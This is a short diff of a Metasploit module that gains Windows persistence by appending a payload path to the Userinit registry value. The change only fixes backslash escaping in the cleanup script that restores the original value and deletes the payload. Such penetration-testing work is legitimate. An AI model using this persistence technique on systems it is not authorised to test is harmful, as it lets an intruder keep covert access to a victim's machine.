windows persistence userinit v6

modules/exploits/windows/persistence/registry_userinit.rb

@@ -85,7 +85,8 @@ class MetasploitModule < Msf::Exploit::Local
     new_value = (old_value.split(',') + [payload_pathname]).join(',')
     vprint_status("Updating '#{old_value}' to '#{new_value}'")
     registry_setvaldata(regkey, 'Userinit', new_value, 'REG_SZ')
-    @clean_up_rc = "execute -f cmd.exe -a '/c reg.exe add \"#{regkey}\" /v Userinit /t REG_SZ /d \"#{old_value}\" /f -H\n"
+    escaped_old_value = old_value.gsub('\\', '\\\\')
+    @clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v Userinit /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
     @clean_up_rc<<"rm #{payload_pathname.gsub('\\','/')}\n"
   end
 end